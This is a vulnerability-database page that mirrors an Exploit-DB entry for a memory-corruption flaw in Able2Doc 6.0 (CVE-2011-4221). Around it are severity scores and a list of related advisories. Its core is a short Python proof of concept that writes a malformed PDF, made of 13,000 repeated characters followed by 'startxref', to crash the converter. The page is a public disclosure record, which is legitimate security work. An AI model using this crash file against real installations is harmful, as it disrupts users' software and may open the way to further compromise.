Lucene search
Carlos Mario Penagos HollmannEDB-ID:19393HistoryJun 25, 2012 - 12:00 a.m.
Able2Doc and Able2Doc Professional 6.0 - Memory Corruption
2012-06-2500:00:00
Carlos Mario Penagos Hollmann
www.exploit-db.com
24
9.3 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
6.6 Medium
AI Score
Confidence
Low
0.007 Low
EPSS
Percentile
79.9%
# Exploit Title: Able2Doc and Able2Doc Professional v 6.0 memory corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4221
payload ="B"*13000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()Related
cve
cve
CVE-2011-4221
2011-11-01 19:55:02
prion
prion
Code injection
2011-11-01 19:55:00
nvd
nvd
CVE-2011-4221
2011-11-01 19:55:02
exploitpack
exploitpack
Able2Doc and Able2Doc Professional 6.0 - Memory Corruption
2012-06-25 00:00:00
packetstorm
packetstorm
Able2Doc / Able2Doc Professional 6.0 Memory Corruption
2012-06-25 00:00:00
nessus
nessus
Investintech Able2Doc < 6.0.8.22 Multiple Vulnerabilities
2012-10-18 00:00:00
seebug
seebug
Able2Doc and Able2Doc Professional 6.0 - Memory Corruption
2014-07-01 00:00:00
cvelist
cvelist
CVE-2011-4221
2011-11-01 19:00:00
openvas
openvas
Investintech Products Denial of Service Vulnerabilities
2011-11-09 00:00:00
Investintech Products Denial of Service Vulnerabilities
2011-11-09 00:00:00
9.3 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
6.6 Medium
AI Score
Confidence
Low
0.007 Low
EPSS
Percentile
79.9%
Related for EDB-ID:19393